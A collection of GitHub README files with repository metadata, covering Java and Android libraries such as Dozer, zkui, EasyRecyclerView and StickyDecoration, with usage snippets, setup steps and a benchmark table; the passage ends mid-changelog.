defaultRTreeSearchOfGreekDataPointsMaxChildren128 thrpt 10 68267.160 ± 929.236 ops/s
rStarTreeDeleteOneEveryOccurrenceFromGreekDataChildren010 thrpt 10 211881.061 ± 3246.693 ops/s
rStarTreeInsertOneEntryInto1000EntriesMaxChildren004 thrpt 10 187062.089 ± 3005.413 ops/s
rStarTreeInsertOneEntryInto1000EntriesMaxChildren010 thrpt 10 186767.045 ± 2291.196 ops/s
rStarTreeInsertOneEntryInto1000EntriesMaxChildren032 thrpt 10 37940.625 ± 743.789 ops/s
rStarTreeInsertOneEntryInto1000EntriesMaxChildren128 thrpt 10 151897.089 ± 674.941 ops/s
rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren004 thrpt 10 237708.825 ± 1644.611 ops/s
rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren010 thrpt 10 229577.905 ± 4234.760 ops/s
rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren032 thrpt 10 78290.971 ± 393.030 ops/s
rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren128 thrpt 10 6521.010 ± 50.798 ops/s
rStarTreeSearchOf1000PointsMaxChildren004 thrpt 10 1330510.951 ± 18289.410 ops/s
rStarTreeSearchOf1000PointsMaxChildren010 thrpt 10 1204347.202 ± 17403.105 ops/s
rStarTreeSearchOf1000PointsMaxChildren032 thrpt 10 576765.468 ± 8909.880 ops/s
rStarTreeSearchOf1000PointsMaxChildren128 thrpt 10 1028316.856 ± 13747.282 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren004 thrpt 10 904494.751 ± 15640.005 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren010 thrpt 10 649636.969 ± 16383.786 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren010FlatBuffers thrpt 10 84230.053 ± 1869.345 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren010FlatBuffersBackpressure thrpt 10 36420.500 ± 1572.298 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren010WithBackpressure thrpt 10 116970.445 ± 1955.659 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren032 thrpt 10 224874.016 ± 14462.325 ops/s
rStarTreeSearchOfGreekDataPointsMaxChildren128 thrpt 10 358636.637 ± 4886.459 ops/s
searchNearestGreek thrpt 10 3715.020 ± 46.570 ops/s
```
There is a related project [rtree-benchmark](https://github.com/ambling/rtree-benchmark) that presents a more comprehensive benchmark with results and analysis on this rtree implementation.
"
DozerMapper/dozer,master,2057,480,2012-01-23T21:11:58Z,21656,6,Dozer is a Java Bean to Java Bean mapper that recursively copies data from one object to another. ,,"[![Build, Test and Analyze](https://github.com/DozerMapper/dozer/actions/workflows/build.yml/badge.svg)](https://github.com/DozerMapper/dozer/actions/workflows/build.yml)
[![Release Version](https://img.shields.io/maven-central/v/com.github.dozermapper/dozer-core.svg?maxAge=2592000)](https://mvnrepository.com/artifact/com.github.dozermapper/dozer-core)
[![License](https://img.shields.io/hexpm/l/plug.svg?maxAge=2592000)]()
# Dozer
## Project Activity
The project is currently not active and will more than likely be deprecated in the future. If you are looking to use Dozer
on a greenfield project, we would discourage that. If you have been using Dozer for a while, we would suggest you start to think about migrating
onto another library, such as:
- [mapstruct](https://github.com/mapstruct/mapstruct)
- [modelmapper](https://github.com/modelmapper/modelmapper)
For those moving to mapstruct, the community has created an [IntelliJ plugin](https://plugins.jetbrains.com/plugin/20853-dostruct) that can help with the migration.
## Why Map?
A mapping framework is useful in a layered architecture where you are creating layers of abstraction by encapsulating changes to particular data objects vs. propagating these objects to other layers (i.e. external service data objects, domain objects, data transfer objects, internal service data objects).
Mapping between data objects has traditionally been addressed by hand coding value object assemblers (or converters) that copy data between the objects. Most programmers will develop some sort of custom mapping framework and spend countless hours and thousands of lines of code mapping to and from their different data objects.
This type of code for such conversions is rather boring to write, so why not do it automatically?
## What is Dozer?
Dozer is a Java Bean to Java Bean mapper that recursively copies data from one object to another, it is an open source mapping framework that is robust, generic, flexible, reusable, and configurable.
Dozer supports simple property mapping, complex type mapping, bi-directional mapping, implicit-explicit mapping, as well as recursive mapping. This includes mapping collection attributes that also need mapping at the element level.
Dozer not only supports mapping between attribute names, but also automatically converting between types. Most conversion scenarios are supported out of the box, but Dozer also allows you to specify custom conversions via XML or code-based configuration.
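As a rough sketch of the code-based option (hedged: the exact builder API can differ between Dozer versions; `SourceClassName`/`DestinationClassName` are the same placeholders used in the Simple Example below):
```Java
import com.github.dozermapper.core.DozerBeanMapperBuilder;
import com.github.dozermapper.core.Mapper;
import com.github.dozermapper.core.loader.api.BeanMappingBuilder;

// Build a Mapper with an in-code mapping instead of XML (placeholder classes)
Mapper mapper = DozerBeanMapperBuilder.create()
        .withMappingBuilder(new BeanMappingBuilder() {
            @Override
            protected void configure() {
                // copy yourSourceFieldName into yourDestinationFieldName
                mapping(SourceClassName.class, DestinationClassName.class)
                        .fields(""yourSourceFieldName"", ""yourDestinationFieldName"");
            }
        })
        .build();
```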
## Getting Started
Check out the [Getting Started Guide](https://dozermapper.github.io/gitbook/documentation/gettingstarted.html), [Full User Guide](https://dozermapper.github.io/user-guide.pdf) or [GitBook](https://dozermapper.github.io/gitbook/) for advanced information.
## Getting the Distribution
If you are using Maven, simply copy-paste this dependency to your project.
```XML
<dependency>
    <groupId>com.github.dozermapper</groupId>
    <artifactId>dozer-core</artifactId>
    <version>7.0.0</version>
</dependency>
```
## Simple Example
```XML
<mapping>
    <class-a>yourpackage.SourceClassName</class-a>
    <class-b>yourpackage.DestinationClassName</class-b>
    <field>
        <a>yourSourceFieldName</a>
        <b>yourDestinationFieldName</b>
    </field>
</mapping>
```
```Java
SourceClassName sourceObject = new SourceClassName();
sourceObject.setYourSourceFieldName(""Dozer"");
Mapper mapper = DozerBeanMapperBuilder.buildDefault();
DestinationClassName destObject = mapper.map(sourceObject, DestinationClassName.class);
assertTrue(destObject.getYourDestinationFieldName().equals(sourceObject.getYourSourceFieldName()));
```
"
dongjunkun/DropDownMenu,master,3591,789,2015-06-23T07:43:56Z,14892,56,一个实用的多条件筛选菜单,dongjunkun dropdown-menus,"[![](https://jitpack.io/v/dongjunkun/DropDownMenu.svg)](https://jitpack.io/#dongjunkun/DropDownMenu)
## Introduction
A practical multi-condition filter menu. You can see this effect in many apps, such as Meituan and the iQIYI movie-ticket app.
My blog post: [Building the wheel yourself -- implementation ideas for a common Android multi-condition filter menu (similar to the Meituan / iQIYI movie-ticket dropdown)](http://www.jianshu.com/p/d9407f799d2d)
## Features
- Supports multi-level menus
- You can fully customize your menu style; this library just encapsulates some practical methods: tab switching effects, menu show/hide animations, etc.
- Not implemented with PopupWindow, so there is no lag
## ScreenShot
Download APK
Or scan the QR code
## Gradle Dependency
```
allprojects {
repositories {
...
maven { url ""https://jitpack.io"" }
}
}
dependencies {
compile 'com.github.dongjunkun:DropDownMenu:1.0.4'
}
```
## Usage
Add DropDownMenu to your layout file, as follows
```
```
Then just call the following code from your Java code
```
//tabs: all the tab titles; popupViews: all the menu views; contentView: the content view
mDropDownMenu.setDropDownMenu(tabs, popupViews, contentView);
```
If you want to learn more, just read the source of the Example
> It is recommended to copy the code into your project: just copy DropDownMenu.java and all the files under res
## About me
Jianshu: [dongjunkun](http://www.jianshu.com/users/f07458c1a8f3/latest_articles)
"
in28minutes/spring-master-class,master,1126,1451,2017-08-07T06:56:45Z,3461,32,"An updated introduction to the Spring Framework 5. Become an Expert understanding the core features of Spring In Depth. You would write Unit Tests, AOP, JDBC and JPA code during the course. Includes introductions to Spring Boot, JPA, Eclipse, Maven, JUnit and Mockito.",,"# Spring Master Class - Journey from Beginner to Expert
[![Image](https://www.springboottutorial.com/images/Course-Spring-Framework-Master-Class---Beginner-to-Expert.png ""Spring Master Class - Beginner to Expert"")](https://www.udemy.com/course/spring-tutorial-for-beginners/)
Learn the magic of Spring Framework. From IOC (Inversion of Control), DI (Dependency Injection), Application Context to the world of Spring Boot, AOP, JDBC and JPA. Get set for an incredible journey.
### Introduction
Spring Framework remains as popular today as it was when I first used it 12 years back. How is this possible in the incredibly dynamic world where architectures have completely changed?
### What You will learn
- You will learn the basics of Spring Framework - Dependency Injection, IOC Container, Application Context and Bean Factory.
- You will understand how to use Spring Annotations - @Autowired, @Component, @Service, @Repository, @Configuration, @Primary....
- You will understand Spring MVC in depth - DispatcherServlet , Model, Controllers and ViewResolver
- You will use a variety of Spring Boot Starters - Spring Boot Starter Web, Starter Data Jpa, Starter Test
- You will learn the basics of Spring Boot, Spring AOP, Spring JDBC and JPA
- You will learn the basics of Eclipse, Maven, JUnit and Mockito
- You will develop a basic Web application step by step using JSP Servlets and Spring MVC
- You will learn to write unit tests with XML, Java Application Contexts and Mockito
### Requirements
- You should have working knowledge of Java and Annotations.
- We will help you install Eclipse and get up and running with Maven and Tomcat.
### Step Wise Details
Refer each section
## Installing Tools
- Installation Video : https://www.youtube.com/playlist?list=PLBBog2r6uMCSmMVTW_QmDLyASBvovyAO3
- GIT Repository For Installation : https://github.com/in28minutes/getting-started-in-5-steps
- PDF : https://github.com/in28minutes/SpringIn28Minutes/blob/master/InstallationGuide-JavaEclipseAndMaven_v2.pdf
## Running Examples
- Download the zip or clone the Git repository.
- Unzip the zip file (if you downloaded one)
- Open Command Prompt and Change directory (cd) to folder containing pom.xml
- Open Eclipse
- File -> Import -> Existing Maven Project -> Navigate to the folder where you unzipped the zip
- Select the right project
- Choose the Spring Boot Application file (search for @SpringBootApplication)
- Right Click on the file and Run as Java Application
- You are all Set
- For help : use our installation guide - https://www.youtube.com/playlist?list=PLBBog2r6uMCSmMVTW_QmDLyASBvovyAO3
### Troubleshooting
- Refer our TroubleShooting Guide - https://github.com/in28minutes/in28minutes-initiatives/tree/master/The-in28Minutes-TroubleshootingGuide-And-FAQ
## Youtube Playlists - 500+ Videos
[Click here - 30+ Playlists with 500+ Videos on Spring, Spring Boot, REST, Microservices and the Cloud](https://www.youtube.com/user/rithustutorials/playlists?view=1&sort=lad&flow=list)
## Keep Learning in28Minutes
in28Minutes is creating amazing solutions for you to learn Spring Boot, Full Stack and the Cloud - Docker, Kubernetes, AWS, React, Angular etc. - [Check out all our courses here](https://github.com/in28minutes/learn)
![in28MinutesLearningRoadmap-July2019.png](https://github.com/in28minutes/in28Minutes-Course-Roadmap/raw/master/in28MinutesLearningRoadmap-July2019.png)
"
DeemOpen/zkui,master,2328,968,2014-05-22T06:15:53Z,493,60,A UI dashboard that allows CRUD operations on Zookeeper.,,"zkui - Zookeeper UI Dashboard
====================
A UI dashboard that allows CRUD operations on Zookeeper.
Requirements
====================
Requires Java 7 to run.
Setup
====================
1. mvn clean install
2. Copy the config.cfg to the folder with the jar file. Modify it to point to the zookeeper instance. Multiple zk instances are comma separated, e.g. server1:2181,server2:2181. The first server should always be the leader.
3. Run the jar. ( nohup java -jar zkui-2.0-SNAPSHOT-jar-with-dependencies.jar & )
4. http://localhost:9090
Login Info
====================
username: admin, pwd: manager (Admin privileges, CRUD operations supported)
username: appconfig, pwd: appconfig (Readonly privileges, Read operations supported)
You can change this in the config.cfg
Technology Stack
====================
1. Embedded Jetty Server.
2. Freemarker template.
3. H2 DB.
4. Active JDBC.
5. JSON.
6. SLF4J.
7. Zookeeper.
8. Apache Commons File upload.
9. Bootstrap.
10. Jquery.
11. Flyway DB migration.
Features
====================
1. CRUD operation on zookeeper properties.
2. Export properties.
3. Import properties via call back url.
4. Import properties via file upload.
5. History of changes + Path specific history of changes.
6. Search feature.
7. Rest API for accessing Zookeeper properties.
8. Basic Role based authentication.
9. LDAP authentication supported.
10. Root node /zookeeper hidden for safety.
11. ACL supported global level.
Import File Format
====================
# add property
/appconfig/path=property=value
# remove a property
-/path/property
You can either upload a file or specify a http url of the version control system that way all your zookeeper changes will be in version control.
Export File Format
====================
/appconfig/path=property=value
You can export a file and then use the same format to import.
SOPA/PIPA BLACKLISTED VALUE
====================
All passwords will be displayed as SOPA/PIPA BLACKLISTED VALUE for a normal user. Admins will be able to view and edit the actual value upon login.
Passwords will not be shown on search / export / view for a normal user.
For a property to be eligible for blacklisting it should have (PWD / pwd / PASSWORD / password) in the property name.
LDAP
====================
If you want to use LDAP authentication, provide the LDAP url. This will take precedence over roleSet property file authentication.
ldapUrl=ldap://<ldap_host>:<ldap_port>/dc=mycom,dc=com
If you don't provide this then the default roleSet file authentication will be used.
REST call
====================
A lot of times you require your shell scripts to be able to read properties from zookeeper. This can now be achieved with an http call. Passwords are not exposed via the rest api for security reasons. The rest call is a read-only operation requiring no authentication.
Eg:
http://localhost:9090/acd/appconfig?propNames=foo&host=myhost.com
This will first lookup the host name under /appconfig/hosts and then find out which path the host point to. Then it will look for the property under that path.
There are 2 additional properties that can be added to give better control.
cluster=cluster1
http://localhost:9090/acd/appconfig?propNames=foo&cluster=cluster1&host=myhost.com
In this case the lookup will happen on lookup path + cluster1.
app=myapp
http://localhost:9090/acd/appconfig?propNames=foo&app=myapp&host=myhost.com
In this case the lookup will happen on lookup path + myapp.
A shell script will call this via
MY_PROPERTY=""$(curl -f -s -S -k ""http://localhost:9090/acd/appconfig?propNames=foo&host=`hostname -f`"" | cut -d '=' -f 2)""
echo $MY_PROPERTY
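The same read-only lookup can also be done from Java with just the standard library (a sketch; the host, the property name and the `ZkuiRestExample` class name are placeholders):
```java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;

public class ZkuiRestExample {
    public static void main(String[] args) throws Exception {
        // same endpoint as the curl example above; adjust host/propNames as needed
        URL url = new URL(""http://localhost:9090/acd/appconfig?propNames=foo&host=myhost.com"");
        try (BufferedReader in = new BufferedReader(new InputStreamReader(url.openStream()))) {
            String line = in.readLine();   // response looks like: foo=bar
            String value = line == null ? null : line.substring(line.indexOf('=') + 1);
            System.out.println(value);
        }
    }
}
```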
Standardization
====================
Zookeeper doesn't enforce any order in which properties are stored and retrieved. ZKUI however organizes properties in the following manner for easy lookup.
Each server/box has its hostname listed under /appconfig/hosts, and that entry points to the path where the properties for that host reside. So when the lookup for a property occurs over a rest call, it first finds the hostname entry under /appconfig/hosts and then looks for that property in the location mentioned.
eg: /appconfig/hosts/myserver.com=/appconfig/dev/app1
This means that when myserver.com tries to look up the property it looks under /appconfig/dev/app1
You can also append app name to make lookup easy.
eg: /appconfig/hosts/myserver.com:testapp=/appconfig/dev/test/app1
eg: /appconfig/hosts/myserver.com:prodapp=/appconfig/dev/prod/app1
Lookup can be done by grouping of app and cluster. A cluster can have many apps under it. When the bootloader entry looks like this /appconfig/hosts/myserver.com=/appconfig/dev the rest lookup happens on the following paths.
/appconfig/dev/..
/appconfig/dev/hostname..
/appconfig/dev/app..
/appconfig/dev/cluster..
/appconfig/dev/cluster/app..
This standardization is only needed if you choose to use the rest lookup. You can use zkui to update properties in general without worrying about this organizing structure.
HTTPS
====================
You can enable https if needed.
keytool -keystore keystore -alias jetty -genkey -keyalg RSA
Limitations
====================
1. ACLs are fully supported but at a global level.
Screenshots
====================
Basic Role Based Authentication
Dashboard Console
CRUD Operations
Import Feature
Track History of changes
Status of Zookeeper Servers
License & Contribution
====================
ZKUI is released under the Apache 2.0 license. Comments, bugs, pull requests, and other contributions are all welcomed!
Thanks to Jozef Krajčovič for creating the logo which has been used in the project.
https://www.iconfinder.com/iconsets/origami-birds
"
Jude95/EasyRecyclerView,master,2029,458,2015-07-18T13:11:48Z,11336,110,"ArrayAdapter,pull to refresh,auto load more,Header/Footer,EmptyView,ProgressView,ErrorView",,"# EasyRecyclerView
[中文](https://github.com/Jude95/EasyRecyclerView/blob/master/README_ch.md) | [English](https://github.com/Jude95/EasyRecyclerView/blob/master/README.md)
Encapsulates many RecyclerView-related APIs into the library, such as an arrayAdapter, pull to refresh, auto load more, no-more and error views at the end, and header & footer support.
The library uses a new style of ViewHolder, decoupling the ViewHolder from the Adapter.
The Adapter does less work: it only directs the ViewHolders, so if you use MVP you can put the adapter into the presenter. A ViewHolder only shows the item, so you can reuse one ViewHolder across many Adapters.
Part of the code is modified from [Malinskiy/SuperRecyclerView](https://github.com/Malinskiy/SuperRecyclerView), with more functions handled by the Adapter.
# Dependency
```groovy
compile 'com.jude:easyrecyclerview:4.4.2'
```
# ScreenShot
![recycler.gif](recycler3.gif)
# Usage
## EasyRecyclerView
```xml
```
**Attention** EasyRecyclerView is not a RecyclerView, it just contains a RecyclerView. Use 'getRecyclerView()' to get the RecyclerView;
**EmptyView&LoadingView&ErrorView**
xml:
```xml
app:layout_empty=""@layout/view_empty""
app:layout_progress=""@layout/view_progress""
app:layout_error=""@layout/view_error""
```
code:
```java
void setEmptyView(View emptyView)
void setProgressView(View progressView)
void setErrorView(View errorView)
```
then you can show any of them whenever you want:
```java
void showEmpty()
void showProgress()
void showError()
void showRecycler()
```
**scrollToPosition**
```java
void scrollToPosition(int position); // such as scroll to top
```
**control the pullToRefresh**
```java
void setRefreshing(boolean isRefreshing);
void setRefreshing(final boolean isRefreshing, final boolean isCallback); // second param: whether to trigger the refresh callback immediately
```
## RecyclerArrayAdapter
There is no dependency between RecyclerArrayAdapter and EasyRecyclerView. You can use any Adapter with EasyRecyclerView, and use RecyclerArrayAdapter with any RecyclerView.
**Data Manage**
```java
void add(T object);
void addAll(Collection<? extends T> collection);
void addAll(T ... items);
void insert(T object, int index);
void update(T object, int index);
void remove(T object);
void clear();
void sort(Comparator<? super T> comparator);
```
**Header&Footer**
```java
void addHeader(ItemView view)
void addFooter(ItemView view)
```
ItemView is not a view but a view creator;
```java
public interface ItemView {
View onCreateView(ViewGroup parent);
void onBindView(View itemView);
}
```
The onCreateView and onBindView correspond to the callbacks in RecyclerView's Adapter, so the adapter will call `onCreateView` once and `onBindView` more than once.
It is recommended to add the ItemView to the Adapter after the data is loaded, initialize the View in onCreateView, and do nothing in onBindView.
Header and Footer support `LinearLayoutManager`, `GridLayoutManager` and `StaggeredGridLayoutManager`.
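For example, a header added after the data has loaded might look like this (a minimal sketch using the ItemView interface above; `R.layout.view_header` is a placeholder layout of your own):
```java
adapter.addHeader(new ItemView() {
    @Override
    public View onCreateView(ViewGroup parent) {
        // called once: inflate and initialize the header view here
        return LayoutInflater.from(parent.getContext())
                .inflate(R.layout.view_header, parent, false);
    }

    @Override
    public void onBindView(View headerView) {
        // called on every bind: per the recommendation above, do nothing here
    }
});
```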
In `GridLayoutManager` you must add this:
```java
// make the adapter provide a SpanSizeLookup for the LayoutManager; the parameter is the max span
gridLayoutManager.setSpanSizeLookup(adapter.obtainGridSpanSizeLookUp(2));
```
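For example, a minimal header sketch combining `addHeader` with the `ItemView` interface above (the layout `R.layout.view_header` is hypothetical):
```java
adapter.addHeader(new ItemView() {
    @Override
    public View onCreateView(ViewGroup parent) {
        // called once: inflate and initialize the header view here
        return LayoutInflater.from(parent.getContext())
                .inflate(R.layout.view_header, parent, false);
    }
    @Override
    public void onBindView(View headerView) {
        // called on every bind: following the recommendation above, do nothing here
    }
});
```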
**OnItemClickListener&OnItemLongClickListener**
```java
adapter.setOnItemClickListener(new RecyclerArrayAdapter.OnItemClickListener() {
@Override
public void onItemClick(int position) {
//position does not include headers
}
});
adapter.setOnItemLongClickListener(new RecyclerArrayAdapter.OnItemLongClickListener() {
@Override
public boolean onItemLongClick(int position) {
return true;
}
});
```
This is equivalent to calling `itemView.setOnClickListener()` in the ViewHolder.
If you set the listener after the RecyclerView has already been laid out, you should call `notifyDataSetChanged()`.
### The APIs below are implemented by adding a Footer
**LoadMore**
```java
void setMore(final int res,OnMoreListener listener);
void setMore(final View view,OnMoreListener listener);
```
Attention: when you add `null` or the data you add has length 0, LoadMore finishes and NoMore is shown.
You can also show NoMore manually with `adapter.stopMore();`.
**LoadError**
```java
void setError(final int res,OnErrorListener listener)
void setError(final View view,OnErrorListener listener)
```
Use `adapter.pauseMore()` to show the error view when your loading throws an error.
If you add data while the error view is showing, loading more resumes.
When the ErrorView scrolls onto the screen again, loading more also resumes and the OnLoadMoreListener is called back (retry).
`adapter.resumeMore()` lets you resume loading more manually; it calls the OnLoadMoreListener back immediately.
You can call `resumeMore()` inside the ErrorView's OnClickListener to implement click-to-retry.
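For instance, a rough sketch of this error-and-retry flow (the `api` call and `errorView` are hypothetical):
```java
// inside your load-more callback:
try {
    adapter.addAll(api.nextPage());   // adding data resumes loading more automatically
} catch (Exception e) {
    adapter.pauseMore();              // show the error view at the end of the list
}
// click-to-retry, e.g. in the error view's click listener:
errorView.setOnClickListener(v -> adapter.resumeMore());
```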
**NoMore**
```java
void setNoMore(final int res,OnNoMoreListener listener)
void setNoMore(final View view,OnNoMoreListener listener)
```
When loading is finished (by adding null or empty data, or stopping manually), it will be shown at the end of the list.
## BaseViewHolder
This decouples the ViewHolder from the Adapter: the Adapter creates the ViewHolder, and the ViewHolder inflates its own view.
Example:
```java
public class PersonViewHolder extends BaseViewHolder<Person> {
private TextView mTv_name;
private SimpleDraweeView mImg_face;
private TextView mTv_sign;
public PersonViewHolder(ViewGroup parent) {
super(parent,R.layout.item_person);
mTv_name = $(R.id.person_name);
mTv_sign = $(R.id.person_sign);
mImg_face = $(R.id.person_face);
}
@Override
public void setData(final Person person){
mTv_name.setText(person.getName());
mTv_sign.setText(person.getSign());
mImg_face.setImageURI(Uri.parse(person.getFace()));
}
}
-----------------------------------------------------------------------
public class PersonAdapter extends RecyclerArrayAdapter<Person> {
public PersonAdapter(Context context) {
super(context);
}
@Override
public BaseViewHolder OnCreateViewHolder(ViewGroup parent, int viewType) {
return new PersonViewHolder(parent);
}
}
```
## Decoration
Three commonly used decorations are provided.
**DividerDecoration**
Usually used with LinearLayoutManager; adds dividers between items.
```java
DividerDecoration itemDecoration = new DividerDecoration(Color.GRAY, Util.dip2px(this,0.5f), Util.dip2px(this,72),0);//color & height & paddingLeft & paddingRight
itemDecoration.setDrawLastItem(true);// whether to draw the divider for the last item; default is true
itemDecoration.setDrawHeaderFooter(false);// whether to draw dividers for the header and footer; default is false
recyclerView.addItemDecoration(itemDecoration);
```
this is the demo:
**SpaceDecoration**
Usually used in GridLayoutManager and StaggeredGridLayoutManager.add space between items.
```java
SpaceDecoration itemDecoration = new SpaceDecoration((int) Utils.convertDpToPixel(8,this));//params is height
itemDecoration.setPaddingEdgeSide(true);// whether to add space on the left and right edges; default is true
itemDecoration.setPaddingStart(true);// whether to add top space for the first line of items (excluding the header); default is true
itemDecoration.setPaddingHeaderFooter(false);// whether to add space for the header and footer; default is false
recyclerView.addItemDecoration(itemDecoration);
```
this is the demo:
**StickHeaderDecoration**
Groups the items and adds a GroupHeaderView for each group. The usage of StickyHeaderAdapter is the same as RecyclerView.Adapter.
this part is modified from [edubarr/header-decor](https://github.com/edubarr/header-decor)
```java
StickyHeaderDecoration decoration = new StickyHeaderDecoration(new StickyHeaderAdapter(this));
decoration.setIncludeHeader(false);
recyclerView.addItemDecoration(decoration);
```
**For more detail, see the demo.**
License
-------
Copyright 2015 Jude
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"
hanks-zyh/SmallBang,master,1005,158,2015-12-24T14:48:37Z,6379,6, twitter like animation for any view :heartbeat:,animation heartbeat like-button twitter,"# SmallBang
twitter like animation for any view :heartbeat:
[Demo APK](https://github.com/hanks-zyh/SmallBang/blob/master/screenshots/demo.apk?raw=true)
## Usage
```groovy
dependencies {
implementation 'pub.hanks:smallbang:1.2.2'
}
```
```xml
```
or
```xml
```
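A minimal Java sketch of triggering the animation from code (the method names `attach2Window` and `bang` are assumptions about the library's API, and `likeButton` is hypothetical):
```java
// attach a SmallBang overlay to the current Activity and play the animation on click
SmallBang smallBang = SmallBang.attach2Window(this);
likeButton.setOnClickListener(v -> smallBang.bang(v));
```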
## Donate
If this project helps you reduce development time, you can buy me a cup of coffee :)
[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UGENU2RU26RUG)
## Contact & Help
Please feel free to contact me if there is any problem using the library.
- **email**: zhangyuhan2014@gmail.com
- **twitter**: https://twitter.com/zhangyuhan3030
- **weibo**: http://weibo.com/hanksZyh
- **blog**: http://hanks.pub
welcome to commit [issue](https://github.com/hanks-zyh/SmallBang/issues) & [pr](https://github.com/hanks-zyh/SmallBang/pulls)
---
## License
This library is licensed under the [Apache Software License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0).
See [`LICENSE`](LICENSE) for the full license text.
Copyright (C) 2015 [Hanks](https://github.com/hanks-zyh)
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"
Gavin-ZYX/StickyDecoration,master,1033,165,2017-05-31T07:38:49Z,1018,3,,,"# StickyDecoration
A sticky group header effect implemented with `RecyclerView.ItemDecoration`.
![Effect](http://upload-images.jianshu.io/upload_images/1638147-89986d7141741cdf.gif?imageMogr2/auto-orient/strip)
## Supports
- **LinearLayoutManager**
- **GridLayoutManager**
- **Click events**
- **Dividers**
## Adding the dependency
Project requirement: `minSdkVersion` >= 14.
In your `build.gradle`:
```gradle
repositories {
maven { url 'https://jitpack.io' }
}
dependencies {
compile 'com.github.Gavin-ZYX:StickyDecoration:1.6.1'
}
```
**Latest version**
[![](https://jitpack.io/v/Gavin-ZYX/StickyDecoration.svg)](https://jitpack.io/#Gavin-ZYX/StickyDecoration)
## Usage
#### Floating text: StickyDecoration
> **Note**
recyclerView.setLayoutManager() must be called before recyclerView.addItemDecoration();
Code:
```java
GroupListener groupListener = new GroupListener() {
@Override
public String getGroupName(int position) {
//return the group name
return mList.get(position).getProvince();
}
};
StickyDecoration decoration = StickyDecoration.Builder
.init(groupListener)
//reset span (required when using GridLayoutManager)
//.resetSpan(mRecyclerView, (GridLayoutManager) manager)
.build();
...
mRecyclerView.setLayoutManager(manager);
//addItemDecoration() must be called after setLayoutManager()
mRecyclerView.addItemDecoration(decoration);
```
Result:
![LinearLayoutManager](http://upload-images.jianshu.io/upload_images/1638147-f3c2cbe712aa65fb.gif?imageMogr2/auto-orient/strip)
![GridLayoutManager](http://upload-images.jianshu.io/upload_images/1638147-e5e0374c896110d0.gif?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
**Supported methods:**
| Method | Purpose | Default |
|-|-|-|
| setGroupBackground | Background color | #48BDFF |
| setGroupHeight | Height | 120px |
| setGroupTextColor | Text color | Color.WHITE |
| setGroupTextSize | Text size | 50px |
| setDivideColor | Divider color | #CCCCCC |
| setDivideHeight | Divider height | 0 |
| setTextSideMargin | Text margin (left margin when left-aligned, right margin when right-aligned) | 10 |
| setHeaderCount | Number of header items (LinearLayoutManager only) | 0 |
| setSticky | Whether to enable the sticky effect | true |
| Method | Purpose | Notes |
|-|-|-|
| setOnClickListener | Click listener | Sets a click listener; returns the position of the first item in the current group |
| resetSpan | Reset span | Must be called when using GridLayoutManager |
### Floating custom view: PowerfulStickyDecoration
First create the layout `item_group`
```xml
```
Then create a `PowerfulStickyDecoration` to use a custom `View` as the sticky header
```java
PowerGroupListener listener = new PowerGroupListener() {
@Override
public String getGroupName(int position) {
return mList.get(position).getProvince();
}
@Override
public View getGroupView(int position) {
//return the custom group view
View view = getLayoutInflater().inflate(R.layout.item_group, null, false);
((TextView) view.findViewById(R.id.tv)).setText(mList.get(position).getProvince());
return view;
}
};
PowerfulStickyDecoration decoration = PowerfulStickyDecoration.Builder
.init(listener)
//reset span (note: required when using GridLayoutManager)
//.resetSpan(mRecyclerView, (GridLayoutManager) manager)
.build();
...
mRecyclerView.addItemDecoration(decoration);
```
Result:
![Effect](http://upload-images.jianshu.io/upload_images/1638147-3fed255296a6c3db.gif?imageMogr2/auto-orient/strip)
**Supported methods:**
| Method | Purpose | Default |
| -- | -- | -- |
| setGroupHeight | Height | 120px |
| setGroupBackground | Background color | #48BDFF |
| setDivideColor | Divider color | #CCCCCC |
| setDivideHeight | Divider height | 0 |
| setCacheEnable | Whether to use the cache | cache enabled |
| setHeaderCount | Number of header items (LinearLayoutManager only) | 0 |
| setSticky | Whether to enable the sticky effect | true |
| Method | Purpose | Notes |
|-|-|-|
| setOnClickListener | Click listener | Sets a click listener; returns the position of the first item in the current group and the id of the clicked view |
| resetSpan | Reset span | Must be called when using GridLayoutManager |
| notifyRedraw | Notify to redraw | Use case: call after a network image has finished loading |
| clearCache | Clear the cache | When caching is enabled, the cache must be cleared whenever the data changes |
**Tips**
1. When using network images, call the following after the image has finished loading:
```java
decoration.notifyRedraw(mRv, view, position);
```
2. When caching is enabled, call clearCache to clear cached data whenever the data source changes (see the sketch after this list).
3. For the click-through problem on the sticky header, see MyRecyclerView in the demo. [issue47](https://github.com/Gavin-ZYX/StickyDecoration/issues/37)
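A minimal sketch of tip 2 (the adapter variable is hypothetical):
```java
// after the underlying data set has changed:
decoration.clearCache();            // drop the cached group headers
mAdapter.notifyDataSetChanged();    // then refresh the list as usual
```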
# Changelog
----------------------------- 1.6.0 (2022-8-21)----------------------------
- fix: disabling the cache had no effect
- migrated the repository
- migrated to AndroidX
----------------------------- 1.5.3 (2020-12-15)----------------------------
- added an option to enable or disable the sticky effect
----------------------------- 1.5.2 (2019-9-3)----------------------------
- fix: poor sticky behavior in some edge cases
----------------------------- 1.5.1 (2019-8-8)----------------------------
